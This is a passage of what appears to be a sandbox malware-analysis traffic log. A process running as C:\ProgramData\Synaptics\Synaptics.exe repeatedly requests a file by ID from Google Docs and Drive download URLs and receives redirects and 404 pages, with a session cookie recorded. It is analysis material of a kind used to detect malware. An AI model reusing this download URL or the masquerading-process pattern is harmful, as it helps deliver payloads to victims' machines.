                                                                                                                                                        2024-12-30 10:48:26 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 6d 76 43 79 6c 48 53 36 37 44 5f 73 62 4f 35 50 6f 6a 71 68 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="zmvCylHS67D_sbO5Pojqhg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:26 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        68192.168.2.750055142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:26 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        69192.168.2.750063142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:26 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:26 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MtXsE35sEmZDf2k6Ninbpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        70192.168.2.750064142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:26 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:26 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-OlTBWQ7lgGL3oDTq6cTU0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        71192.168.2.750072142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:27 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:27 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-iIj4SqzgSsBN-siTSODDwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        72192.168.2.750071142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:27 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4b0UZLAT798HZAbBJTykZ34GBErku33TJ6pcvb4JZS4b6-nhX5_JJaw3Rd-brlAk5d5D8uHWo
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:27 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Oji1xqDDsPCoXnltD1_51A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 6c 69 53 45 34 51 68 38 67 32 73 55 4f 73 6c 58 57 55 37 46 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="bliSE4Qh8g2sUOslXWU7FA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        73192.168.2.750074142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:27 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:28 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4IOpGA8Ao2P20TgHDrxvot3lOI0h_vJjeYmv8bO54H1CdIiT8NreImJfuZj5BAo8-q
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:28 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4TSUNT34mCQ5ghWjHmM4dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:28 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:28 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 71 69 63 4e 4f 69 6f 37 6a 4a 6a 2d 6f 4c 54 5f 45 64 6b 32 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="5qicNOio7jJj-oLT_Edk2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:28 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        74192.168.2.750073142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:27 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:27 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7MQM6wOywVHpJA-CopQhMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        75192.168.2.750087142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:28 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:28 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-usaXxj7j3ESyqd1wMkPt_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        76192.168.2.750088142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
